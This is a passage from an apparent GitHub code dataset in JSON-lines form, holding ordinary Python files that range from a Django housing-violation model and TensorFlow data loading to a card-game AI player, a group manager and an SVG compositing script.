db_column='bin', db_constraint=False,\n on_delete=models.SET_NULL, null=True, blank=True)\n buildingid = models.ForeignKey('HPDBuildingRecord', db_column='buildingid', db_constraint=False,\n on_delete=models.SET_NULL, null=True, blank=True)\n registrationid = models.IntegerField(blank=True, null=True)\n boroid = models.TextField(blank=True, null=True)\n borough = models.TextField(db_index=True)\n housenumber = models.TextField()\n lowhousenumber = models.TextField(blank=True, null=True)\n highhousenumber = models.TextField(blank=True, null=True)\n streetname = models.TextField(blank=True, null=True)\n streetcode = models.TextField(blank=True, null=True)\n postcode = models.TextField(blank=True, null=True)\n apartment = models.TextField(blank=True, null=True)\n story = models.TextField(blank=True, null=True)\n block = models.TextField(blank=True, null=True)\n lot = models.TextField(blank=True, null=True)\n class_name = models.TextField(blank=True, null=True)\n inspectiondate = models.DateField(blank=True, null=True)\n approveddate = models.DateField(blank=True, null=True)\n originalcertifybydate = models.DateField(blank=True, null=True)\n originalcorrectbydate = models.DateField(blank=True, null=True)\n newcertifybydate = models.DateField(blank=True, null=True)\n newcorrectbydate = models.DateField(blank=True, null=True)\n certifieddate = models.DateField(blank=True, null=True)\n ordernumber = models.TextField(blank=True, null=True)\n novid = models.IntegerField(blank=True, null=True)\n novdescription = models.TextField(blank=True, null=True)\n novissueddate = models.DateField(blank=True, null=True)\n currentstatusid = models.IntegerField(blank=True, null=True)\n currentstatus = models.TextField(db_index=True, blank=True, null=True)\n currentstatusdate = models.DateField(db_index=True, blank=True, null=True)\n novtype = models.TextField(blank=True, null=True)\n violationstatus = models.TextField(db_index=True, blank=True, null=True)\n latitude = models.DecimalField(\n decimal_places=8, max_digits=32, blank=True, null=True)\n longitude = models.DecimalField(\n decimal_places=8, max_digits=32, blank=True, null=True)\n communityboard = models.TextField(blank=True, null=True)\n councildistrict = models.IntegerField(blank=True, null=True)\n censustract = models.TextField(blank=True, null=True)\n nta = models.TextField(blank=True, null=True)\n rentimpairing = models.TextField(default='', blank=True, null=True)\n\n slim_query_fields = [\"violationid\", \"bbl\", \"approveddate\"]\n\n @classmethod\n def create_async_update_worker(self, endpoint=None, file_name=None):\n async_download_and_update.delay(\n self.get_dataset().id, endpoint=endpoint, file_name=file_name)\n\n @classmethod\n def download(self, endpoint=None, file_name=None):\n return self.download_file(self.download_endpoint, file_name=file_name)\n\n @classmethod\n def pre_validation_filters(self, gen_rows):\n for row in gen_rows:\n if is_null(row['violationid']):\n continue\n yield row\n\n # trims down new update files to preserve memory\n # uses original header values\n @classmethod\n def update_set_filter(self, csv_reader, headers):\n for row in csv_reader:\n if headers.index('InspectionDate') and is_older_than(row[headers.index('InspectionDate')], 2):\n continue\n yield row\n\n @classmethod\n def transform_self(self, file_path, update=None):\n return self.pre_validation_filters(from_csv_file_to_gen(file_path, update))\n\n @classmethod\n def seed_or_update_self(self, **kwargs):\n logger.info(\"Seeding/Updating {}\", self.__name__)\n self.seed_with_upsert(**kwargs)\n\n @classmethod\n def annotate_properties(self):\n self.annotate_all_properties_standard()\n\n def __str__(self):\n return str(self.violationid)\n\n\n@receiver(models.signals.post_save, sender=HPDViolation)\ndef annotate_property_on_save(sender, instance, created, **kwargs):\n if created == True:\n try:\n\n annotation = sender.annotate_property_standard(\n instance.bbl.propertyannotation)\n annotation.save()\n except Exception as e:\n print(e)\n","repo_name":"ANHD-NYC-CODE/anhd-council-backend","sub_path":"datasets/models/HPDViolation.py","file_name":"HPDViolation.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"22618602094","text":"import os\nfrom time import sleep \n\n# fork之前的代码只有父进程会执行\nprint(\"*******************\")\n#fork之前产生内存空间的存储,子进程也会有\na = 1\n#创建新的进程\npid = os.fork()\n\nif pid < 0:\n print(\"创建进程失败\")\n# 只有子进程执行的部分\nelif pid == 0:\n sleep(1)\n print(\"a = \",a)\n print(\"新创建的进程\")\n# 只有父进程会运行的部分\nelse:\n sleep(5)\n print(\"原来的进程\")\n\n#if结构外的代码父子进程都会执行\nprint(\"程序执行完毕\")","repo_name":"wangyuhui12/AID1804","sub_path":"pythonNet/day4/fork.py","file_name":"fork.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"16459083032","text":"# -*- coding: utf-8 -*-\n\nfrom functools import partial\nimport tensorflow as tf\n\n\n@tf.function\ndef parse_tfrecord(example_proto, features=None, labels=None, patch_shape=None):\n keys = features + labels\n columns = [\n tf.io.FixedLenFeature(shape=patch_shape, dtype=tf.float32) for k in keys\n ]\n proto_struct = dict(zip(keys, columns))\n inputs = tf.io.parse_single_example(example_proto, proto_struct)\n inputs_list = [inputs.get(key) for key in keys]\n stacked = tf.stack(inputs_list, axis=0)\n stacked = tf.transpose(stacked, [1, 2, 0])\n return tf.data.Dataset.from_tensors(stacked)\n\n\n@tf.function\ndef to_tuple(dataset, n_features=None):\n features = dataset[:, :, :, :n_features]\n labels = dataset[:, :, :, n_features:]\n labels_inverse = tf.math.abs(labels - 1)\n labels = tf.concat([labels_inverse, labels], axis=-1)\n return features, labels\n\n\n@tf.function\ndef random_transform(dataset):\n x = tf.random.uniform(())\n\n if x < 0.10:\n dataset = tf.image.flip_left_right(dataset)\n elif tf.math.logical_and(x >= 0.10, x < 0.20):\n dataset = tf.image.flip_up_down(dataset)\n elif tf.math.logical_and(x >= 0.20, x < 0.30):\n dataset = tf.image.flip_left_right(tf.image.flip_up_down(dataset))\n elif tf.math.logical_and(x >= 0.30, x < 0.40):\n dataset = tf.image.rot90(dataset, k=1)\n elif tf.math.logical_and(x >= 0.40, x < 0.50):\n dataset = tf.image.rot90(dataset, k=2)\n elif tf.math.logical_and(x >= 0.50, x < 0.60):\n dataset = tf.image.rot90(dataset, k=3)\n elif tf.math.logical_and(x >= 0.60, x < 0.70):\n dataset = tf.image.flip_left_right(tf.image.rot90(dataset, k=2))\n else:\n pass\n return dataset\n\n\n@tf.function\ndef flip_inputs_up_down(inputs):\n return tf.image.flip_up_down(inputs)\n\n\n@tf.function\ndef flip_inputs_left_right(inputs):\n return tf.image.flip_left_right(inputs)\n\n\n@tf.function\ndef transpose_inputs(inputs):\n flip_up_down = tf.image.flip_up_down(inputs)\n transpose = tf.image.flip_left_right(flip_up_down)\n return transpose\n\n\n@tf.function\ndef rotate_inputs_90(inputs):\n return tf.image.rot90(inputs, k=1)\n\n\n@tf.function\ndef rotate_inputs_180(inputs):\n return tf.image.rot90(inputs, k=2)\n\n\n@tf.function\ndef rotate_inputs_270(inputs):\n return tf.image.rot90(inputs, k=3)\n\n\ndef get_dataset(files, features, labels, patch_shape, batch_size,\n buffer_size=1000, training=False, **kwargs):\n parser = partial(parse_tfrecord,\n features=features,\n labels=labels,\n patch_shape=patch_shape\n )\n\n split_data = partial(to_tuple, n_features=len(features))\n\n dataset = tf.data.TFRecordDataset(files, compression_type='GZIP')\n dataset = dataset.interleave(parser, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\n if training:\n dataset = dataset.shuffle(buffer_size, reshuffle_each_iteration=True).batch(batch_size) \\\n .map(random_transform, num_parallel_calls=tf.data.experimental.AUTOTUNE) \\\n .map(split_data, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n else:\n dataset = dataset.batch(batch_size).map(split_data, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\n return dataset\n","repo_name":"Servir-Mekong/surface-water-map-unet","sub_path":"model/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"26850184605","text":"from __future__ import annotations\n\nimport abc\nimport re\nimport string\nimport sys\nfrom typing import Any, Optional\nimport unicodedata\n\nfrom explainaboard.utils.tokenizer import MLQAMixTokenizer, SingleSpaceTokenizer\n\n\n@abc.abstractmethod\nclass Preprocessor:\n def __init__(\n self, language: str | None = None, resources: Optional[dict[str, Any]] = None\n ):\n self.language = language\n self.resources = resources or self.default_resources()\n\n def set_language(self, language: str) -> Preprocessor:\n self.language = language\n return self\n\n def default_resources(self) -> dict[str, Any]:\n \"\"\"Returns default features for this processor.\"\"\"\n return {}\n\n @abc.abstractmethod\n def process(self, s: str, resources: dict[str, Any]) -> str:\n \"\"\"\n Get default processing function\n :return:\n \"\"\"\n ...\n\n def __call__(self, text: str) -> str:\n \"\"\"\n preprocess text\n :param text: text to be preprocessed\n :return: preprocessed text\n \"\"\"\n return self.process(text, self.resources)\n\n\nclass MapPreprocessor(Preprocessor):\n def default_resources(self) -> dict:\n \"\"\"Returns default features for this processor.\"\"\"\n return {\"dictionary\": {}}\n\n def process(self, s: str, resources: dict[str, Any]) -> str:\n return resources['dictionary'].get(s, s)\n\n\nclass KGMapPreprocessor(Preprocessor):\n def default_resources(self) -> dict:\n \"\"\"Returns default features for this processor.\"\"\"\n return {\"dictionary\": {}}\n\n def process(self, s: str, resources: dict[str, Any]) -> str:\n return (\n resources['dictionary'][s][\"label\"] if s in resources['dictionary'] else s\n )\n\n\nclass ExtractiveQAPreprocessor(Preprocessor):\n \"\"\"\n A preprocessor to process answers in extractive QA tasks.\n Currently it is based on the MLQA paper.\n \"\"\"\n\n PUNCT = {\n chr(i)\n for i in range(sys.maxunicode)\n if unicodedata.category(chr(i)).startswith('P')\n }.union(string.punctuation)\n WHITESPACE_LANGS = ['en', 'es', 'hi', 'vi', 'de', 'ar']\n MIXED_SEGMENTATION_LANGS = ['zh']\n\n ss_tokenizer = SingleSpaceTokenizer()\n mlqa_tokenizer = MLQAMixTokenizer()\n\n def default_resources(self) -> dict:\n \"\"\"Returns default features for this processor.\"\"\"\n return {\"language\": self.language}\n\n def process(self, s: str, resources: dict[str, Any]) -> str:\n \"\"\"Lower text and remove punctuation, articles and extra whitespace.\"\"\"\n\n language = resources['language']\n\n def remove_articles(text: str, lang: str) -> str:\n if lang in ['en', 'eng']:\n return re.sub(r'\\b(a|an|the)\\b', ' ', text)\n elif lang in ['es', 'spa']:\n return re.sub(r'\\b(un|una|unos|unas|el|la|los|las)\\b', ' ', text)\n elif lang in ['vi', 'vie']:\n return re.sub(r'\\b(của|là|cái|chiếc|những)\\b', ' ', text)\n elif lang in ['de', 'deu']:\n return re.sub(\n r'\\b(ein|eine|einen|einem|eines|einer|der|die|das|den|dem|'\n r'des)\\b',\n ' ',\n text,\n )\n elif lang in ['ar', 'ara']:\n # TODO(Pengfei): W605 invalid escape sequence '\\s'\n return re.sub('\\sال^|ال', ' ', text) # noqa\n else:\n return text\n\n def white_space_fix(text: str, lang: str) -> str:\n\n if lang in self.MIXED_SEGMENTATION_LANGS:\n tokens = self.mlqa_tokenizer(text)\n else:\n tokens = self.ss_tokenizer(text)\n return ' '.join([t for t in tokens if t.strip() != ''])\n\n def remove_punc(text: str) -> str:\n return ''.join(ch for ch in text if ch not in self.PUNCT)\n\n def lower(text: str) -> str:\n return text.lower()\n\n return white_space_fix(\n remove_articles(remove_punc(lower(s)), language), language\n )\n","repo_name":"pfliu-nlp/ExplainaBoard-Debug","sub_path":"explainaboard/utils/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"1299098554","text":"def ReparentPrefab_UnderPrefabAndEntityHierarchies():\n\n from pathlib import Path\n CAR_PREFAB_FILE_NAME = Path(__file__).stem + '_car_prefab'\n WHEEL_PREFAB_FILE_NAME = Path(__file__).stem + '_wheel_prefab'\n DRIVER_PREFAB_FILE_NAME = Path(__file__).stem + '_driver_prefab'\n\n import pyside_utils\n\n @pyside_utils.wrap_async\n async def run_test():\n\n from editor_python_test_tools.editor_entity_utils import EditorEntity\n from editor_python_test_tools.prefab_utils import Prefab\n from editor_python_test_tools.wait_utils import PrefabWaiter\n\n import Prefab.tests.PrefabTestUtils as prefab_test_utils\n import azlmbr.legacy.general as general\n\n async def reparent_with_undo_redo(prefab_file_name, prefab_instance, new_parent_entity_id):\n # Get ids for original parent, original container id, and new parent\n original_parent = EditorEntity(prefab_instance.container_entity.get_parent_id())\n original_container_id = prefab_instance.container_entity.id\n new_parent = EditorEntity(new_parent_entity_id)\n\n # Reparent to the new parent\n await prefab_instance.ui_reparent_prefab_instance(new_parent_entity_id)\n\n # Undo the reparent operation, and verify original parent is restored\n general.undo()\n PrefabWaiter.wait_for_propagation()\n original_parent_children_ids = original_parent.get_children_ids()\n new_parent_children_ids = new_parent.get_children_ids()\n instance_id = general.find_editor_entity(prefab_file_name)\n assert instance_id in original_parent_children_ids, \\\n \"Undo failed: Failed to find instance as a child of the original parent.\"\n assert instance_id not in new_parent_children_ids, \\\n \"Undo failed: Unexpectedly still found instance as a child of the new parent.\"\n\n # Redo the reparent operation, and verify the new instance is not among the original parent's child entities\n general.redo()\n PrefabWaiter.wait_for_propagation()\n original_parent_children_ids = original_parent.get_children_ids()\n new_parent_children_ids = new_parent.get_children_ids()\n instance_id = general.find_editor_entity(prefab_file_name)\n assert instance_id not in original_parent_children_ids, \\\n \"Redo failed: Unexpectedly found prefab instance as a child of the original parent.\"\n assert instance_id in new_parent_children_ids, \\\n \"Redo failed: Failed to find instance as a child of the new parent.\"\n\n prefab_test_utils.open_base_tests_level()\n\n # Creates a new car entity at the root level\n car_entity = EditorEntity.create_editor_entity()\n car_prefab_entities = [car_entity]\n\n # Creates a prefab from the car entity\n _, car = Prefab.create_prefab(car_prefab_entities, CAR_PREFAB_FILE_NAME)\n\n # Creates another new wheel entity at the root level\n wheel_entity = EditorEntity.create_editor_entity()\n wheel_prefab_entities = [wheel_entity]\n\n # Creates another prefab from the wheel entity\n _, wheel = Prefab.create_prefab(wheel_prefab_entities, WHEEL_PREFAB_FILE_NAME)\n\n # Creates another new driver entity at the root level\n driver_entity = EditorEntity.create_editor_entity()\n driver_prefab_entities = [driver_entity]\n\n # Creates another prefab from the driver entity\n _, driver = Prefab.create_prefab(driver_prefab_entities, DRIVER_PREFAB_FILE_NAME)\n\n # Creates a few new entity hierarchies starting at the root level\n non_prefab_entity = EditorEntity.create_editor_entity(\"Non-Prefab Entity\")\n non_prefab_parent_entity = EditorEntity.create_editor_entity(\"Non-Prefab Parent Entity\")\n non_prefab_child_entity = EditorEntity.create_editor_entity(\"Non-Prefab Child Entity\",\n non_prefab_parent_entity.id)\n\n # Ensure focus gets set on the prefab you want to parent under. This mirrors how users would do\n # reparenting in the editor.\n car.container_entity.focus_on_owning_prefab()\n\n # Reparents the wheel prefab instance to the container entity of the car prefab instance\n await reparent_with_undo_redo(WHEEL_PREFAB_FILE_NAME, wheel, car.container_entity.id)\n\n # Reparents the driver instance to the container entity of the now nested car/wheel prefab\n wheel.container_entity.focus_on_owning_prefab()\n await reparent_with_undo_redo(DRIVER_PREFAB_FILE_NAME, driver, wheel.container_entity.id)\n\n # Reparents the wheel prefab instance to the non-prefab entity at the root level\n non_prefab_entity.focus_on_owning_prefab()\n await reparent_with_undo_redo(WHEEL_PREFAB_FILE_NAME, wheel, non_prefab_entity.id)\n\n # Reparents the wheel prefab instance to the child entity of the non-prefab entity hierarchy\n non_prefab_child_entity.focus_on_owning_prefab()\n await reparent_with_undo_redo(WHEEL_PREFAB_FILE_NAME, wheel, non_prefab_child_entity.id)\n\n run_test()\n\n\nif __name__ == \"__main__\":\n from editor_python_test_tools.utils import Report\n Report.start_test(ReparentPrefab_UnderPrefabAndEntityHierarchies)\n","repo_name":"LaLiszka/Game-engine","sub_path":"AutomatedTesting/Gem/PythonTests/Prefab/tests/reparent_prefab/ReparentPrefab_UnderPrefabAndEntityHierarchies.py","file_name":"ReparentPrefab_UnderPrefabAndEntityHierarchies.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14275074726","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCA Implicit Certificate EC\n\"\"\"\n\nimport datetime\nfrom fastecdsa.point import Point\nfrom fastecdsa import keys, curve, ecdsa\nfrom fastecdsa.keys import export_key, gen_keypair\nfrom fastecdsa.keys import import_key\nimport random\n\ndef setCurve(a):\n\n if a == 0: \n curva = curve.P192\n if a == 1: \n curva = curve.P224\n if a == 2: \n curva = curve.P256\n if a == 3: \n curva = curve.P384\n if a == 4: \n curva = curve.P521\n if a == 5: \n curva = curve.secp192k1\n if a == 6: \n curva = curve.secp224k1\n if a == 7: \n curva = curve.secp256k1\n \n timeInit = datetime.datetime.now()\n \n #Parametros de la curva\n n = curva.p\n d = curva.G\n q = random.randint(1,n)\n \n #Id del dispositivo\n disp = \"DispositivoA\"\n \n #Estado o provincia del dispositivo\n state = \"Bogota\"\n \n #Ciudad del dispositivo\n city = \"Bogota\"\n \n #Organizacion del dispositivo\n org = \"Uniandes\"\n \n #Dominio del dispositivo\n dom = \"Uniandes.edu.co\"\n \n # Dispositivo A genera punto R\n priv_keyA, pub_keyA = keys.gen_keypair(curva)\n R = Point(pub_keyA.x, pub_keyA.y, curva)\n \n # Llave del CA\n priv_keyCA, pub_keyCA = keys.gen_keypair(curva)\n \n #CA genera un entero q\n Q = d * q\n\n # Suma Q + R\n D = Q + R\n \n #Fecha de expedicion del certificado\n expedicion = datetime.datetime.utcnow()\n\n # Fecha de expiracion del certificado\n expiracion=datetime.datetime.utcnow() + datetime.timedelta(days=30)\n \n #Se genera el certificado implicito (IC)\n IC = disp+\"-\"+state+\"-\"+city+\"-\"+org+\"-\"+dom+\"-\"+str(D)+\"-\"+str(expedicion)+\"-\"+str(expiracion)\n hIC = hash(IC)\n \n #Se genera la implicit signature a partir de la cual A construye su llave privada\n s = (hIC*q)+priv_keyCA\n \n timeFin = datetime.datetime.now()\n time = timeFin - timeInit\n string = str(time)+\" - \"+curva.name\n print(string)\n return string\n \n \n\n \n ","repo_name":"jjmartinezc/Certificate","sub_path":"CA.py","file_name":"CA.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38323147406","text":"#!/usr/bin/python\nimport sys\nimport re\nimport os\n\n\"\"\"\nFilter OTUs from BIOM files\n(1)In all samples, average relative abundance=1/average reads per sample\n(2)In each treatment group, average relative abundance=sum rel/number of samples in the group\n(3)Criteria: \navg_rel_group=(sum of rel in this group)/number of samples in this group\ndetectable_rel_avg=1/(average number of read of all samples)\nAt least in one group avg_rel_group>=detectable_rel_avg\n\"\"\"\ndef get_taxa_otus(file,out_fh):\n\tin_fh=open(file,'r')\n\tcount=0\n\tfor line in in_fh:\n\t\tcount=count+1\n\t\tline=line.rstrip('\\n')\n\t\tlist=line.split('\\t',)\n\t\tif count<=2:\n\t\t\tout_fh.write(line+'\\n')\n\t\t\tif count==2:\n\t\t\t\tfor i,v in enumerate(list):\n\t\t\t\t\tif i>0 and i=avg_rel:\n\t\t\t\tflag_good_otu=1\n\t\t\n\t\t\n\t\t#Print out OTUs, which pass filter cutoff\n\t\t#At lease one group\n\t\tif flag_good_otu==1:\n\t\t\ttaxa_out_fh.write(id)\n\t\t\tfor i,v in enumerate(dict_otu[id]):\n\t\t\t\ttaxa_out_fh.write('\\t'+str(dict_otu[id][i]))\n\t\t\ttaxa_out_fh.write('\\n')\n\n\treturn\n\n\n\"\"\"\nMain funtions\n\"\"\"\nif len( sys.argv ) != 4:\n raise Exception( \"Usage: filter_0.03Cluster_TaxaTable.py \")\n\ntaxa_otu_infile=sys.argv[1]\ntaxa_otu_outfile=sys.argv[2]\ndesign_file=sys.argv[3]\n\n\n#Process OTUs table with taxonomic information\ntaxa_out_fh=open(taxa_otu_outfile,'w')\n#Key:OTU id\n#Values(list):all samples,[-1]taxonomy\ndict_otu={}\n#value:sampleID/total number of reads\nlist_samples=[]\nget_taxa_otus(taxa_otu_infile,taxa_out_fh)\n\n#Calculate releative abundance for each sample in each OTU\n#Key:OTU id \n#Values(list):all samples of releative abundance\ndict_otu_rel={}\nfor id,value in dict_otu.items():\n\tfor i,iv in enumerate(dict_otu[id]):\n\t\t#Last column is taxonomy information\n\t\tif i==len(dict_otu[id])-1:\n\t\t\tbreak\n\t\trel_value=float(dict_otu[id][i])/float(list_samples[i][1])\n\t\tif id in dict_otu_rel:\n\t\t\tdict_otu_rel[id].append(rel_value)\n\t\telse:\n\t\t\tdict_otu_rel[id]=[rel_value,]\n\n\n#Calculate the average relative abundance\nsum=0\ncount_samples=len(list_samples)\nfor i,iv in enumerate(list_samples):\n\tsum=sum+list_samples[i][1]\navg_ab=float(sum)/float(count_samples)\navg_rel=float(1)/avg_ab\n#print avg_ab\n#print avg_rel\n\n#Get design file information\n#Key:sampleID\n#Value:group\ndict_design_samples={}\n#Key:groupID\n#Value:1\ndict_design={}\nget_design_info(design_file)\n\n#Filter OTUs according to the rule\nfilter_taxa_otus(taxa_out_fh)\ntaxa_out_fh.close()\n\n\nquit()\n","repo_name":"chemokine/16sMothurPipeline","sub_path":"filter_0.03Cluster_TaxaTable.py","file_name":"filter_0.03Cluster_TaxaTable.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32060601448","text":"import random\nfrom operator import attrgetter\n\nfrom engine import Game\nfrom players.interactive_player import InteractivePlayer\nfrom players.player import Player\nfrom user_actions import *\n\ndef _get_action_of_type(a_type, actions):\n for a in actions:\n if isinstance(a, a_type):\n yield a\n\n\nclass SimplePolicy:\n def simple_pile_policy(self, p, action, piles, min_n, max_n):\n if action == 'destory':\n # choose base/outpost with highest health to destroy\n return piles[0], sorted(piles[0], key=attrgetter('defence'), reverse=True)[:max_n]\n elif action == 'discard':\n # discard cheapest cards\n return piles[0], sorted(piles[0], key=attrgetter('cost'))[:min_n]\n elif action == 'discard_draw':\n # cycle cheap cards\n return piles[0], [c for c in piles[0] if c.cost == 1][:max_n]\n elif action == 'scrap':\n if piles[0].name == 'trade':\n # we don't scrap from trade row\n return None, None\n\n try:\n discard_p = next(p for p in piles if p.name=='discard')\n if min_n == 0:\n # return only cheap cards\n return discard_p, [c for c in discard_p if c.cost == 1][:max_n]\n else:\n return discard_p, sorted(discard_p, key=attrgetter('cost'))[:min_n]\n except StopIteration:\n pass # no discard\n\n hand_p = piles[0]\n if min_n == 0:\n return None, None\n else:\n return hand_p, sorted(hand_p, key=attrgetter('cost'))[:min_n]\n elif action == 'buy':\n c = self.choose_buy_card(piles[0])\n if c:\n return piles[0], [c]\n else:\n return None, None\n # buy most expensive, but only if cost > 3\n c = max(piles[0], key=attrgetter('cost'))\n if c.cost > 3:\n return piles[0], [c]\n else:\n return None, None\n\n\n def simple_action_policy(self, p1: Player, game, p2, actions):\n from actions import ActionDiscardAndDraw, ActionDrawThenScrap, ActionScarpDrawCard\n\n # first play bases\n for base_a in _get_action_of_type(UserActionPlayCard, actions):\n if isinstance(base_a.card, (BaseCard, OutpostCard)):\n return base_a\n\n # optional discard/scrap actions\n for discard_a in _get_action_of_type(UserActionCardAction, actions):\n if isinstance(discard_a, (ActionDiscardAndDraw, ActionDrawThenScrap)):\n if len(c for c in p1.hand if c.cost == 1) > 0:\n return discard_a\n if isinstance(discard_a, ActionScarpDrawCard):\n if len(c for c in p1.discard_pile if c.cost == 1) > 0:\n return discard_a\n\n # play all cards\n for a in _get_action_of_type(UserActionPlayCard, actions):\n return a\n\n # other optional actions\n\n # buy good cards\n buys = list(_get_action_of_type(UserActionBuyCard, actions))\n if buys:\n b = self.choose_buy_actions(game, p1, p2, buys)\n if b:\n return b\n\n # do damage\n outposts = sorted(_get_action_of_type(UserActionAttackOutpost, actions), key=lambda a: a.outpost.defence, reverse=True)\n if outposts:\n return outposts[0]\n\n bases = sorted(_get_action_of_type(UserActionAttackBase, actions), key=lambda a: a.base.defence, reverse=True)\n if bases:\n return bases[0]\n\n for a in _get_action_of_type(UserActionAttackFace, actions):\n return a\n\n for a in _get_action_of_type(UserActionDone, actions):\n return a\n\n return random.choice(actions)\n\n def choose_buy_actions(self, game, p1, p2, buys):\n card_to_action = {a.card: a for a in buys}\n c = self.choose_buy_card(game, p1, p2, list(card_to_action.keys()))\n if c:\n return card_to_action[c]\n\n def choose_buy_card(self, game, p1, p2, cards):\n # buy most expensive\n b = max(cards, key=attrgetter('cost'))\n return b\n\nclass SimplePlayer(Player, SimplePolicy):\n def choose_action(self, b, p_other, actions):\n return self.simple_action_policy(self, b, p_other, actions)\n\n choose_card_action = choose_action\n\n def do_choose_from_piles(self, action, piles, min_n, max_n):\n return self.simple_pile_policy(self, action, piles, min_n, max_n)\n\nif __name__ == '__main__':\n p1 = InteractivePlayer('p1')\n p2 = SimplePlayer('p2')\n g = Game(players=[p1, p2])\n winner = g.run()","repo_name":"shinbet/star_realms","sub_path":"players/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1920386233","text":"from athanor.classes.scripts import AthanorScript\nfrom athanor.utils.text import sanitize_string, partial_match, sanitize_group_name\nfrom athanor.groups.models import GroupTier, Group\n\n\nclass GroupManager(AthanorScript):\n\n def at_script_creation(self):\n self.key = \"Group Manager\"\n self.desc = \"Organizes Groups\"\n\n def at_start(self):\n GroupTier.objects.get_or_create(number=0,private=False)\n GroupTier.objects.get_or_create(number=0,private=True)\n\n def find_tier(self,number,private):\n try:\n number = int(number)\n except:\n raise ValueError(\"Must enter a Number for tier!\")\n private = bool(private)\n tier = GroupTier.objects.filter(number=number,private=private).first()\n if not tier:\n raise ValueError(\"Tier not found!\")\n return tier\n\n def create_tier(self,number,name,private):\n try:\n number = int(number)\n except:\n raise ValueError(\"Must enter a Number for tier!\")\n name = sanitize_group_name(name)\n private = bool(private)\n\n if GroupTier.objects.filter(number=number,private=private).count():\n raise ValueError(\"Tier already exists!\")\n\n if GroupTier.objects.filter(name__iexact=name,private=private).count():\n raise ValueError(\"Tier name already in use!\")\n\n tier, created = GroupTier.objects.get_or_create(number=number,name=name,private=private)\n return tier\n\n def rename_tier(self, number, private, new_name):\n tier = self.find_tier(number,private)\n newname = sanitize_group_name(new_name)\n\n if GroupTier.objects.filter(name__iexact=new_name,private=private).count():\n raise ValueError(\"Tier name already in use!\")\n\n tier.name = new_name\n tier.save(update_fields=['name'])\n\n def display(self, viewer, private):\n message = list()\n message.append(viewer.render.header(\"%s Groups\" % \"Private\" if private else \"Public\"))\n head_table = viewer.render.make_table([\"Name\", \"Leader\", \"Second\", \"Conn\"],\n header=False, width=[30, 21, 21, 8])\n message.append(head_table)\n for tier in GroupTier.objects.filter(private=private).order('number'):\n message.append(tier.display(viewer,footer=False))\n message.append(viewer.render.footer())\n return message\n\n def create_group(self, name, tier_number, private):\n name = sanitize_group_name(name)\n tier = self.find_tier(tier_number, private)\n if Group.objects.filter(key__iexact=name).first():\n raise ValueError(\"Group already exists! Names must be unique.\")\n group = Group.objects.create(tier=tier,key=name)\n return group\n\n def find_group(self, viewer, name, ignore_permissions=False):\n groups = Group.objects.all().order('key')\n if not ignore_permissions:\n groups = [group for group in groups if group.visible_to(viewer)]\n name = sanitize_group_name(name)\n group = partial_match(name, groups)\n if not group:\n raise ValueError(\"Group '%s' not found!\" % name)\n return group\n\n def rename_group(self, viewer, name, new_name):\n group = self.find_group(viewer, name)\n new_name = sanitize_group_name(new_name)\n exist = Group.objects.filter(key__iexact=new_name).exclude(id=group.id)\n if exist:\n raise ValueError(\"Group names must be unique!\")\n group.key = new_name\n group.save(update_fields=['key'])\n group.setup_channels()\n\n def change_tier(self, viewer, name, new_tier, private):\n tier = self.find_tier(new_tier, private)\n group = self.find_group(viewer, name)\n group.tier = tier\n group.save(update_fields=['tier'])\n\n def disband_group(self, viewer, name, confirm_name):\n group = self.find_group(viewer, name)\n confirm_name = sanitize_string(confirm_name)\n if not Group.objects.filter(id=group.id, key__iexact=confirm_name).count():\n raise ValueError(\"Must enter the group's full case-insensitive name to continue!\")\n if not group.check_permission(viewer, 'admin'):\n raise ValueError(\"Permission denied!\")\n group.delete()","repo_name":"castlelorestudios/athanor","sub_path":"athanor_groups/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10266850982","text":"from __future__ import with_statement\nimport sys\nfrom lxml import etree\n\nsys.path.append('..')\nfrom lightning_svg import LightningSvg\n\nclass LightningElement(object):\n def __init__(self, html, css, div, anims):\n self.html = html\n self.css = css\n self.div = div\n self.anims = anims\n\ndef composite(baseElm, newdiv):\n for elm in baseElm.iterfind('.//div'):\n if elm.get('id') == 'body':\n elm.getparent().replace(elm, etree.fromstring(newdiv))\n return baseElm\n\ndef get_lightning_element(filepath, mcname, key_prefix):\n with open(filepath, 'r') as f:\n return LightningElement(*(LightningSvg().xml2svg(f, mcname=mcname, key_prefix=key_prefix, has_anim_name=False, scale=1.0)))\n\ndef composite_html(base, part, output_path):\n comp_div = composite(etree.fromstring(base.div), part.div)\n html = LightningSvg().make_html(etree.tostring(comp_div), base.css+part.css, part.anims)\n with open(output_path, 'w') as f:\n f.write(html)\n\nif __name__ == '__main__':\n base_element = get_lightning_element('sample_base.xml', mcname=None, key_prefix='base')\n myobj1_element = get_lightning_element('sample1.xml', mcname='body', key_prefix='myobj1')\n myobj2_element = get_lightning_element('sample2.xml', mcname='body', key_prefix='myobj2')\n\n composite_html(base_element, myobj1_element, 'merged1.html')\n composite_html(base_element, myobj2_element, 